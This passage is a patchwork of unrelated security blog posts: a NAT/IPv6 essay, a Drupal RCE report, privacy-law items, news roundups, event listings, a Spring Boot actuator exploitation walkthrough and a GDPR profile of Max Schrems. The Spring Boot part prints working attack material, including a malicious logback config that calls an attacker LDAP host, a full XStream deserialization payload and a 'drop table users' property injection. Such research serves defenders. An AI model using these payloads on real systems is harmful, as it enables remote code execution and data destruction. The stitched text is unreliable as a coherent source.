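        key = (src_ip, src_port)
        if key not in self.out_map:
            self.out_map[key] = self.next_port
            self.in_map[self.next_port] = key
            self.next_port += 1
        return PUBLIC_IP, self.out_map[key]

    def inbound(self, dst_port):
        """Rewrite an incoming packet back to the private host."""
        return self.in_map[dst_port]

nat = Nat()
public_src = nat.outbound("192.168.1.10", 51000)
print(public_src)                   # what the outside world sees
print(nat.inbound(public_src[1]))   # reply mapped back to the private host
```

Because the mapping is keyed on ports as well as addresses, many private hosts can share the one public address, which is the whole trick.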
This violates the end-to-end principle, but only a little bit. While the NAT is translating addresses, it's still not doing things like acknowledging TCP packets. That's still the job of the ends.
As we all know, IPv6 was created in order to expand the size of addresses, from 32 bits to 128 bits, making a gazillion addresses available. It's often described in terms of the Internet running out of addresses and needing more, but that's not the case. With NAT, the IPv4 Internet will never run out of addresses.
Instead, what IPv6 does is preserve the end-to-end principle, by keeping routers dumb.
I mention this because I find discussions of IPv6 a bit tedious. The standard litany is that we need IPv6 so that we can have more than 4-billion devices on the Internet, and people keep repeating this despite there being more than 10-billion devices on the IPv4 Internet.
As I stated above, this isn't just a basic question, but the basic question. It's at the center of a whole web of interlocking decisions that define the nature of cyberspace itself.
From the time the phone system was created in the 1800s up until the 2007 release of the iPhone, phone companies wanted to control the applications that users ran on their network. The OSI Model that you learn as the basis of networking isn't what you think it is: it was designed with the AT&T phone network and IBM mainframes being in control over your applications.
The creation of TCP/IP and the Internet changed this, putting all the power in the hands of the ends of the network. The version of the OSI Model you end up learning is a retconned model, with all the original important stuff stripped out, and only the bits that apply to TCP/IP left remaining.
Of course, now we live in a world monopolized by the Google, the Amazon, and the Facebook, so we live in some sort of dystopic future. But it's not a future dominated by AT&T.
|Heywood Floyd phones home in 2001: A Space Odyssey|
Powerful malicious actors continue to be a substantial risk to key parts of the Internet and its Domain Name System security infrastructure, so much so that The Internet Corporation for Assigned Names and Numbers is calling for an intensified community effort to install stronger DNS security technology.
Specifically, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC) across all unsecured domain names. DNS, often called the internet’s phonebook, is part of the global internet infrastructure that translates between common language domain names and IP addresses that computers need to access websites or send emails. DNSSEC adds a layer of security on top of DNS.
Another remote code execution vulnerability has been revealed in Drupal, the popular open-source Web content management system. One exploit — still working at time of this writing — has been used in dozens of unsuccessful attacks against our customers, with an unknown number of attacks, some likely successful, against other websites.
Published on February 20th, the new vulnerability (known as CVE 2019-6340 and SA-CORE-2019-003) involves field types that don’t sanitize data from non-form sources when the Drupal 8 core REST module and another web services module such as JSON:API are both enabled. This allows arbitrary PHP remote code execution that could lead to compromise of the web server.
An exploit was published a day after the vulnerability was published, and continues to work even after following the Drupal team’s proposed remediation of disabling all web services modules and banning PUT/PATCH/POST requests to web services resources. Despite the fix, it is still possible to issue a GET request and therefore perform remote code execution as was the case with the other HTTP methods. Fortunately, users of Imperva’s Web Application Firewall (WAF) were protected.
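As a defensive check, one can test whether a Drupal 8 site still serves REST responses to GET requests, the vector left open by the initial mitigation. The sketch below uses only the standard library; the base URL is a placeholder and the response heuristics are assumptions, not part of the published exploit. Probe only sites you are authorized to test.

```python
# Hedged sketch: does this Drupal 8 site answer GET requests to a REST
# route? A JSON-family response suggests web services modules are active.
from urllib.request import urlopen, Request
from urllib.error import URLError, HTTPError

def rest_get_enabled(base="http://127.0.0.1:8080"):
    req = Request(base + "/node/1?_format=hal_json",
                  headers={"Accept": "application/hal+json"})
    try:
        with urlopen(req, timeout=5) as resp:
            ctype = resp.headers.get("Content-Type", "")
            return "json" in ctype
    except HTTPError as err:
        # 404/406 suggest REST routing is off; other codes (e.g. 403)
        # suggest the route exists but access was denied.
        return err.code not in (404, 406)
    except (URLError, OSError):
        return False
```

A `True` result is only a hint to go patch; it does not confirm exploitability.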
Imperva research teams constantly analyze attack traffic from the wild that passes between clients and websites protected by our services. We’ve found dozens of attack attempts aimed at dozens of websites that belong to our customers using this exploit, including sites in government and the financial services industry.
The attacks originated from several attackers and countries, and all were blocked thanks to generic Imperva policies that had been in place long before the vulnerability was published.
Figure 1 below shows the daily number of CVE 2019-6340 exploits we’ve seen in the last couple of days.
Figure 1: Attacks by date
As always, attacks followed soon after the exploit was published. So being up to date with security updates is a must.
According to Imperva research, 2018 saw a year-over-year increase in Drupal vulnerabilities, with names such as DirtyCOW and Drupalgeddon 1, 2 and 3. These were used in mass attacks that targeted hundreds of thousands of websites.
The following is CoinIMP’s client side embedded script (https://pastebin.com/raw/RxqMSZEk). The script uses a 64 character length key generated by the CoinIMP panel to designate the site key of the attacker on CoinIMP.
The attacker’s payload also tries to install a shell uploader to upload arbitrary files on demand.
Here is the upload shell (http://pastebin.com/raw/P6N6XP2Q) content:
Imperva Customers Protected
Customers of Imperva Web Application Firewall (WAF, formerly Incapsula) were protected from this attack due to our RCE detection rules. So although the attack vector is new, its payload is old and has been dealt with in the past.
We also added new dedicated and generic rules to our WAF (both the services formerly known as Incapsula and SecureSphere) to strengthen our security and provide wider coverage to attacks of this sort.
The post Latest Drupal RCE Flaw Used by Cryptocurrency Miners and Other Attackers appeared first on Blog.
A 3-steps-guide to building your personal brand and advancing your InfoSec career.
Developing a personal brand can offer numerous benefits to your life and career. In addition, it can also help in building up your confidence and credibility to future employers, or even business partners.
Here are some of the things to cross off your list to get started with your personal branding:
Build Up Social Media Profiles
Your presence on LinkedIn and other professional and educational networking sites can help build up your personal brand. Here are some of the things you should list:
- Your experience: Where you have interned, worked, consulted, helped, etc.
- Your accomplishments: What have you helped companies achieve? Have you organized a successful InfoSec event? Did you successfully handle a live attack?
- Your practical and personal skills: Both make up your personal brand. Practical skills show what you are capable of in your career, while personal skills will attract the right kind of partners and/or employers.
- Your career goals: Have you reached your most ambitious goal? Whether you have or not, list it here. You never know who might have insight or who can help you get there.
Create Valuable Content
It’s good to say what you’re capable of, it’s better to show it. Creating valuable content and giving back to the InfoSec community goes a long way to building your personal brand. Here are some ideas of content you can create to build your trust and authority:
- Write “How-To” blogs and video tutorials to help others get better at whatever topics you feel are important to write about.
- Share reviews on software and services to help guide others after you.
- Participate in guest-speaking webinars to discuss your area of expertise and answer questions other professionals might have.
- Write blogs about your career to guide other professionals down the same path, or about the software and tools that you use, to teach readers the tricks.
- Record InfoSec-related podcasts if you’re not good at writing, but feel at ease behind the microphone.
While there’s a multitude of possible content to create to build your personal brand, it’s important to remember that you want to focus on what people want to watch, listen to, or read about. To know that, it’s important to network with other professionals and aspiring professionals. Which brings us to our next point…
Network & Help Others
Make security conferences your best friend, but don’t stop there. From the comfort of your own home, you can network with students and professionals around the world via social media, forums, groups, and dedicated professional networks such as The Ethical Hacker Network.
Learn more about the various ways EH-Net can add value to your career.
Networking with other professionals is not just about you and building your personal brand; it’s also about giving back to the InfoSec community, just as others before you may have helped you grow.
Building your personal brand takes a bit of time, but it also brings endless opportunities to life, whether projects, new job offers, or good friends with the same passion for all things security.
Interested in taking a first step to building your personal brand? Find out how you can get published on The Ethical Hacker Network today.
Connect with us on Social Media:
The Belgian Data Protection Authority (the “Belgian DPA”) recently published (in French and in Dutch) the updated list of the types of processing activities which require a data protection impact assessment (“DPIA”). Article 35.4 of the EU General Data Protection Regulation (“GDPR”) obligates supervisory authorities (“SAs”) to establish a list of the processing operations that require a DPIA and transmit it to the European Data Protection Board (the “EDPB”).
The draft list was published in April 2018. In October, the EDPB adopted an Opinion on the draft DPIA lists established by the SAs, including the Belgian DPA. Following the EDPB’s Opinion, the Belgian DPA modified its list. The Belgian DPA asserts that this list is neither exhaustive nor final and could be modified in the future.
According to the Belgian DPA, the following data processing activities require companies to conduct a DPIA:
- Processing of biometric data for the purpose of uniquely identifying individuals in a public area or private area that is publicly accessible;
- Collecting personal data from third parties in order to weigh that information in making a decision to refuse or end a contract with an individual;
- Collecting health-related data by automated means through an active implantable medical device;
- Processing of personal data collected on a large scale by third parties to analyze or predict the economic situation, health, preferences or personal interests, reliability or behavior, localization or movements of natural persons;
- Systematic sharing between several data controllers of special categories of personal data (“sensitive personal data”) or data of a very personal nature (such as data related to poverty, unemployment, youth support or social work, data related to domestic and private activities, and location data);
- Large-scale processing of data generated by devices with sensors that send data over the Internet or any other means (i.e., Internet of Things applications such as smart TV, smart household appliances, connected toys, smart cities, smart energy systems) for the purpose of analyzing or predicting individuals’ economic situation, health, preferences or personal interests, reliability or behavior, localization or movements;
- Large-scale and/or systematic processing of telephony data, Internet data or other communication data, metadata or localization data of individuals, or that can lead to specific individuals (e.g., Wi-Fi tracking or processing of individuals’ localization data in public transports), when such processing is not strictly necessary for the service requested by the individuals; and
- Large-scale processing of personal data where individuals’ behavior is observed, collected, established or influenced in a systematic manner and using automated means, including for advertising purposes.
Last week on Malwarebytes Labs, we explored the world of crack hunting, gave you a 101 on the world of bots and their threats and advantages, and took a look at some clever phishing scams. We also explained how a Mac fends off malware, posted a handy “lazy person’s guide to cybersecurity,” and dug into some APT action.
Other security news
- YouTube ran into major problems, specifically, a network of pedophiles. (Source: Wired)
- Facebook improved location settings: Android users will now find they possess greater control over which information is shared with Facebook. (Source: Facebook)
- Big extortion, big money: Research reveals “salaries” of up to a quarter of a million dollars in return for getting up to dubious antics online. (Source: The Register)
- Flaw, blimey: A 19-year-old WinRAR bug was discovered. (Source: CheckPoint)
- Political infighting leads to data blowout: It’s all very exciting over in the UK, as a major political party reported a former member for alleged breach-related activity. (Source: The Guardian)
- Collection leaks and compromised passwords: How to steer clear of trouble related to the ongoing “Collection” dumps. (Source: Help Net Security)
- An egg in this trying time: A malware campaign offers up an eggy attack targeting job seekers. (Source: Proofpoint)
- ATM hacking: A look at how easy ATM shenanigans have become. (Source: Wired)
- BabyShark phishing: Yes, it’s a spear phishing campaign called BabyShark. (Source: ZDNet)
- Wi-Fi and social engineering: A look at some of the most common social engineering tricks deployed against networks. (Source: Security Boulevard)
Stay safe, everyone!
Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy.
Cloud & Cyber Security Expo: London, 12-13 March
Brian Honan will be presenting at this two-day event which takes place in London’s ExCel venue. There will be close to 150 speakers at the conference, which aims to help organisations implementing a digital transformation strategy to do so securely. General information is available at the event website, and organisers are still finalising the full speaker lineup. You can register via the site or directly at this link.
Security BSides Dublin: 23 March 2019
The hugely successful and growing Security BSides series is coming to Dublin for the first time. The event will take place at the Convention Centre Dublin on Saturday 23 March 2019. We at BH Consulting have been long-time supporters of the community-driven series, and we’ll be sponsoring the inaugural Dublin event. The organisers are still accepting calls for papers from industry newcomers and veterans alike. Visit here to find out more.
Data Protection Officer certification course: Maastricht, 1-5 April
BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at this course, and a link to book a place is available here.
Procurex Ireland 2019: Dublin, 4 April
BH Consulting will be exhibiting at Procurex Ireland 2019, a conference dedicated to procurement in healthcare. The day-long event is an opportunity for buyers and suppliers to engage and drive greater efficiencies and savings in an area with a combined spend of more than €12 billion. The conference will take place on Thursday 4 April at the RDS Exhibition Centre in Dublin. More details here.
Zero Days CTF: Dublin, 5 April
The Irish Colleges Cyber Challenge, better known as Zero Days CTF, will take place on Friday 5 April. BH Consulting is supporting this event, which aims to showcase and identify the best cybersecurity students in the country. The event caters for all skill levels and will include more than 50 unique challenges. To find out more, or to register a team, visit the Zero Days website.
Dublin Data Sec 2019: 30 April
Brian Honan is among a range of international speakers and subject matter experts lined up for this year’s data security conference. Topics for the 2019 edition include privacy and data leaks, dealing with breaches, data protection in the public sector, encryption, blockchain, and much more. The event takes place at the RDS Conference Hall on Tuesday 30 April. Standard tickets cost €350 and registration is via this link. General information about the conference is available here.
The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.
Microsoft's Windows Defender Advanced Threat Protection (ATP) service is now available for PCs running Windows 7 and Windows 8.1.
The decision to add devices powered by those operating systems was first announced a year ago. At the time, Microsoft said ATP's Endpoint Detection & Response (EDR) functionality would be available for the older OSes by summer 2018.
Windows Defender ATP is a service that detects ongoing attacks on corporate networks, then follows up to investigate the attack or breach and provides response recommendations and attack remediation. Software baked into Windows 10 detects attacks, while a central management console allows IT administrators to monitor the status of covered devices and react if necessary. Adding the EDR client software to Windows 7 and Windows 8.1 PCs gives enterprise IT the same visibility into those machines as it has had into Windows 10 systems.
The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured.
When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env' etc) into the routing process. For Spring Boot 1 - 1.4, they are accessible without authentication, causing significant problems with security. Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.
The following Actuator endpoints could potentially have security implications leading to possible vulnerabilities:
- /dump - displays a dump of threads (including a stack trace)
- /trace - displays the last several HTTP messages (which could include session identifiers)
- /logfile - outputs the contents of the log file
- /shutdown - shuts the application down
- /mappings - shows all of the MVC controller mappings
- /env - provides access to the configuration environment
- /restart - restarts the application
For Spring Boot 1.x, they are registered under the root URL, and in 2.x they moved to the "/actuator/" base path.
Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters:
1. Remote Code Execution via '/jolokia'
If the Jolokia Library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX. It is possible to list all available MBeans actions using the URL:
Again, most of the MBeans actions just reveal some system data, but one is particularly interesting:
The 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to:
So, why should we care about logging config? Mainly because of two things:
- Config has an XML format, and of course, Logback parses it with External Entities enabled, hence it is vulnerable to blind XXE.
- The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name into the .lookup() function, we don't even need XXE or HeapDump because it gives us a full Remote Code Execution.
How it works:
1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'qos.logback.classic.jmx.JMXConfigurator' class.
2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content:
<configuration>
  <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" />
</configuration>
3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the “env-entry-name” parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger an execution of the supplied bytecode on the target application. JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework.
2. Config modification via '/env'
If Spring Cloud libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environment properties. All beans annotated as '@ConfigurationProperties' may be modified and rebound. Many, but not all, of the properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is absolutely not clear what we need to modify to achieve something. After spending a couple of days playing with them, we found this:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register at it and send status updates to it. If you are lucky enough to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is to set the 'eureka.client.serviceUrl.defaultZone' property to your server URL (http://artsploit.com/n/xstream) via '/env' and then call the '/refresh' endpoint. After that, your server should serve the XStream payload with the following content:
<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>
This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints.
Using Spring Actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an "/env" endpoint available.
Other useful settings:
spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.
spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string.
The last one looks great, but the problem is that by the time the application is running, the database connection is already established, so just updating the JDBC string does not have any effect. Fortunately, there is another property that may help us in this case:
The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally against MySQL and it works like a charm.
Apart from that, there are other properties that look interesting, but, in practice, are not really useful:
spring.datasource.url - database connection string (used only for the first connection)
spring.datasource.jndiName - database JNDI string (used only for the first connection)
spring.datasource.tomcat.dataSourceJNDI - database JNDI string (not used at all)
spring.cloud.config.uri=http://artsploit.com/ - spring cloud config url (does not have any effect after app start, only the initial values are used.)
These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts the whole ApplicationContext, but it's disabled by default.
There are a lot of other interesting properties, but most of them do not take immediate effect after change.
N.B. In Spring Boot 2.x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses JSON instead), but the idea is the same.
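As a rough illustration of the two dialects, here is the same property override built for each version; the endpoint paths are the framework defaults, and no host is assumed:

```python
# Spring Boot 1.x vs 2.x: the same '/env' property override in both formats.
import json
import urllib.parse

prop = "spring.datasource.tomcat.validationQuery"
value = "drop table users"

# Spring Boot 1.x: form-encoded POST to /env, one "name=value" pair per property.
boot1_path = "/env"
boot1_body = urllib.parse.urlencode({prop: value})

# Spring Boot 2.x: JSON POST to /actuator/env with explicit name/value fields.
boot2_path = "/actuator/env"
boot2_body = json.dumps({"name": prop, "value": value})
```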
An example of the vulnerable app:
If you want to test this vulnerability locally, I created a simple Spring Boot application on my GitHub page. All payloads should work there, except for the database settings (unless you configure them).
Black box discovery:
A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using the @Endpoint annotation.
Almost one decade ago, disparate efforts began in the European Union to change the way the world thinks about online privacy.
One effort focused on legislation, pulling together lawmakers from 28 member-states to discuss, draft, and deploy a sweeping set of provisions that, today, has altered how almost every single international company handles users’ personal information. The finalized law of that effort—the General Data Protection Regulation (GDPR)—aims to protect the names, addresses, locations, credit card numbers, IP addresses, and even, depending on context, hair color, of EU citizens, whether they’re customers, employees, or employers of global organizations.
The second effort focused on litigation and public activism, sparking a movement that has raised nearly half a million dollars to fund consumer-focused lawsuits meant to uphold the privacy rights of EU citizens, and has resulted in the successful dismantling of a 15-year-old intercontinental data-transfer agreement for its failure to protect EU citizens’ personal data. The 2015 ruling sent shockwaves through the security world, and forced companies everywhere to scramble to comply with a regulatory system thrown into flux.
The law was passed. The movement is working. And while countless individuals launched investigations, filed lawsuits, participated in years-long negotiations, published recommendations, proposed regulations, and secured parliamentary approval, we can trace these disparate yet related efforts back to one man—Maximilian Schrems.
Remarkably, as the two efforts progressed separately, they began to inform one another. Today, they work in tandem to protect online privacy. And businesses around the world have taken notice.
The impact of GDPR today
A Portuguese hospital, a German online chat platform, and a Canadian political consultancy all face GDPR-related fines issued last year. In January, France’s National Data Protection Commission (CNIL) hit Google with a 50-million-euro penalty—the largest GDPR fine to date—after an investigation found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.”
The investigation began, CNIL said, after it received legal complaints from two groups: the nonprofit La Quadrature du Net and the non-governmental organization None of Your Business. None of Your Business, or noyb for short, counts Schrems as its honorary director. In fact, he helped crowdfund its launch last year.
Outside the European Union, lawmakers are watching these one-two punches as a source of inspiration.
When testifying before Congress about a scandal involving misused personal data, the 2016 US presidential election, and a global disinformation campaign, Facebook CEO Mark Zuckerberg repeatedly heard calls to regulate his company and its data-mining operations.
“The question is no longer whether we need a federal law to protect consumers’ privacy,” said Republican Senator John Thune of South Dakota. “The question is what shape will that law take.”
Democratic Senator Mark Warner of Virginia put it differently: “The era of the Wild West in social media is coming to an end.”
A new sheriff comes to town
In 2011, Schrems was a 23-year-old law student from Vienna, Austria, visiting the US to study abroad. He enrolled in a privacy seminar at the Santa Clara University School of Law where, along with roughly 22 other students, he learned about online privacy law from one of the field’s notable titans.
Professor Dorothy Glancy practiced privacy law before it had anything to do with the Internet, cell phones, or Facebook. Instead, she navigated the world of government surveillance, wiretaps, and domestic spying. She served as privacy counsel to one of the many subcommittees that investigated the Watergate conspiracy.
Later, still working for the subcommittee, she examined the number of federal agency databases that contained people’s personally identifiable information. She then helped draft the Privacy Act of 1974, which restricted how federal agencies collected, used, and shared that information. It is one of the first US federal privacy laws.
The concept of privacy has evolved since those earlier days, Glancy said. It is no longer solely about privacy from the government. It is also about privacy from corporations.
“Over time, it’s clear that what was, in the 70s, a privacy problem in regards to Big Brother and the federal government, has now gotten so that a lot of these issues have to do with the private [non-governmental] collection of information on people,” Glancy said.
In 2011, one of the biggest private, non-governmental collectors of that information was Facebook. So, when Glancy’s class received a guest presentation from Facebook privacy lawyer Ed Palmieri, Schrems paid close attention, and he didn’t like what he heard.
For starters, Facebook simply refused to heed Europe’s data privacy laws.
Speaking to 60 Minutes, Schrems said: “It was obviously the case that ignoring European privacy laws was the much cheaper option. The maximum penalty, for example, in Austria, was 20,000 euros. So, just a lawyer telling you how to comply with the law was more expensive than breaking it.”
Further, according to Glancy, Palmieri’s presentation showed that Facebook had “absolutely no understanding” about the relationship between an individual’s privacy and their personal information. This blind spot concerned Schrems to no end. (Palmieri could not be reached for comment.)
“There was no understanding at all about what privacy is in the sense of the relationship to personal information, or to human rights issues,” Glancy said. “Max couldn’t quite believe it. He didn’t quite believe that Facebook just didn’t understand.”
So Schrems investigated. (Schrems did not respond to multiple interview requests, including one forwarded by his colleagues at Noyb.)
Upon returning to Austria, Schrems decided to figure out just how much information Facebook had on him. The answer was astonishing: Facebook sent Schrems a 1,200-page PDF that detailed his location history, his contact information, information about past events he attended, and his private Facebook messages, including some he thought he had deleted.
Shocked, Schrems started a privacy advocacy group called “Europe v. Facebook” and uploaded redacted versions of his own documents onto the group’s website. The revelations touched a public nerve—roughly 40,000 Europeans soon asked Facebook for their own personal dossiers.
The Irish Data Protection Commissioner rolled Schrems’ complaints into an already-running audit into Facebook, and, in December 2011, released non-binding guidance for the company. Facebook’s lawyers also met with Schrems in Vienna for six hours in February 2012.
And then, according to Schrems’ website, only silence and inaction from both Facebook and the Irish Data Protection Commissioner’s Office followed. There were no meaningful changes from the company. And no stronger enforcement from the government.
Frustrating as it may have been, Schrems kept pressing. Luckily, according to Glancy, he was just the right man for the job.
“He is innately curious,” Glancy said. “Once he sees something that doesn’t quite seem right, he follows it up to the very end.”
Safe Harbor? More like safety not guaranteed
On June 5, 2013, multiple newspapers exposed two massive surveillance programs in use by the US National Security Agency. One program, then called PRISM (now called Downstream), implicated some of the world’s largest technology companies, including Facebook.
Schrems responded by doing what he did best: He filed yet another complaint against Facebook—his 23rd—with the Irish Data Protection Commissioner. Facebook Ireland, Schrems claimed, was moving his data to Facebook Inc. in the US, where, according to The Guardian, the NSA enjoyed “mass access” to user data. Though Facebook and other companies denied their participation, Schrems doubted the accuracy of these statements.
“There is probable cause to believe that ‘Facebook Inc’ is granting the NSA mass access to its servers that goes beyond merely individual requests based on probable cause,” Schrems wrote in his complaint. “The statements by ‘Facebook Inc’ are in light of the US laws not credible, because ‘Facebook Inc’ is bound by so-called ‘gag orders.’”
Schrems argued that, when his data left EU borders, EU law required that it receive an “adequate level of protection.” Mass surveillance, he said, violated that.
The Irish Data Protection Commissioner disagreed. The described EU-to-US data transfer was entirely legal, the Commissioner said, because of Safe Harbor, a data privacy carve-out approved much earlier.
In 1995, the EU adopted the Data Protection Directive, which, up until 2018, regulated the treatment of EU citizens’ personal data. In 2000, the European Commission approved an exception to the law: US companies could agree to a set of seven principles, called the Safe Harbor Privacy Principles, to allow for data transfer from the EU to the US. This self-certifying framework proved wildly popular. For 15 years, nearly every single company that moved data from the EU to the US relied, at least briefly, on Safe Harbor.
Unsatisfied, Schrems asked the Irish High Court to review the Data Protection Commissioner’s inaction. In October 2013, the court agreed. Schrems celebrated, calling out the Commissioner’s earlier decision.
“The [Data Protection Commissioner] simply wanted to get this hot potato off his table instead of doing his job,” Schrems said in a statement at the time. “But when it comes to the fundamental rights of millions of users and the biggest surveillance scandal in years, he will have to take responsibility and do something about it.”
Less than one year later, the Irish High Court came back with its decision—the Court of Justice for the European Union would need to review Safe Harbor.
On March 24, 2015, the Court heard oral arguments for both sides. Schrems’ legal team argued that Safe Harbor did not provide adequate protection for EU citizens’ data. The European Commission, defending the Irish DPC’s previous decision, argued the opposite.
When asked by the Court how EU citizens might best protect themselves from the NSA’s mass surveillance, the lawyer arguing in favor of Safe Harbor made a startling admission:
“You might consider closing your Facebook account, if you have one,” said Bernhard Schima, advocate for the European Commission, all but admitting that Safe Harbor could not protect EU citizens from overseas spying. When asked more directly if Safe Harbor provided adequate protection of EU citizens’ data, the European Commission’s legal team could not guarantee it.
On September 23, 2015, the Court’s advocate general issued his initial opinion—Safe Harbor, in light of the NSA’s mass surveillance programs, was invalid.
“Such mass, indiscriminate surveillance is inherently disproportionate and constitutes an unwarranted interference with the rights [to respect for privacy and family life and protection of personal data,]” the opinion said.
Less than two weeks later, the entire Court of Justice agreed.
Ever a lawyer, Schrems responded to the decision with a 5,500-word blog post (assigned a non-commercial Creative Commons public copyright license) exploring current data privacy law, Safe Harbor alternatives, company privacy policies, a potential Safe Harbor 2.0, and mass surveillance. Written with “limited time,” Schrems thanked readers for pointing out typos.
The General Data Protection Regulation
Before the Court of Justice struck down Safe Harbor, before Edward Snowden shed light on the NSA’s mass surveillance, before Schrems received a 1,200-page PDF documenting his digital life, and before that fateful guest presentation in professor Glancy’s privacy seminar at Santa Clara University School of Law, a separate plan was already under way to change data privacy.
In November 2010, the European Commission, which proposes legislation for the European Union, considered a new policy with a clear goal and equally clear title: “A comprehensive approach on personal data protection in the European Union.”
Many years later, it became GDPR.
During those years, the negotiating committees looked to Schrems’ lawsuits as highly informative, Glancy said, because Schrems had successfully proven the relationship between the European Charter of Fundamental Human Rights and its application to EU data privacy law. Ignoring that expertise would be foolish.
“Max [Schrems] was a part of just about all the committees working on [GDPR]. His litigation was part of what motivated the adoption of it,” Glancy said. “The people writing the GDPR would consult him as to whether it would solve his problems, and parts of the very endless writing process were also about what Max [Schrems] was not happy with.”
Because Schrems did not respond to multiple interview requests, it is impossible to know his precise involvement in GDPR. His Twitter and blog have no visible, corresponding entries about GDPR’s passage.
However, public records show that GDPR’s drafters recommended several areas of improvement in the year before the law passed, including clearer definitions of “personal information,” stronger investigatory powers to the EU’s data regulators, more direct “data portability” to allow citizens to directly move their data from one company to another while also obtaining a copy of that data, and better transparency in how EU citizens’ online profiles are created and targeted for ads.
GDPR eventually became a sweeping set of 99 articles that tightly govern the collection, storage, use, transfer, and disclosure of data belonging to all EU citizens, giving those citizens more direct control over how their data is treated.
For example, citizens have the “right to erasure,” in which they can ask a company to delete the data collected on them. Citizens also have the “right to access,” in which companies must provide a copy of the data collected on a person, along with information about how the data was collected, who it is shared with, and why it is processed.
Approved by a parliamentary vote in April 2016, GDPR took effect two years later.
GDPR’s immediate and future impact
Since then, compliance looks less like emails and more like penalties.
Early this year, Google received its €50 million ($57 million) fine out of France. Last year, a Portuguese hospital received a €400,000 fine for two alleged GDPR violations. Because of a July 2018 data breach, a German chat platform got hit with a €20,000 fine. And in the reported first-ever GDPR notice from the UK, Canadian political consultancy—and murky partner to Cambridge Analytica—AggregateIQ received a notice about potential fines of up to €20 million.
To Noyb, the fines are good news. Gaëtan Goldberg, a privacy lawyer with the NGO, said that data privacy law compliance has, for many years, been lacking. Hopefully GDPR, which Goldberg called a “major step” in protecting personal data, can help turn that around, he said.
“[We] hope to see strong enforcement measures being taken by courts and data protection authorities around the EU,” Goldberg said. “The fine of 50 [million] euros the French CNIL imposed on Google is a good start in this direction.”
The future of data privacy
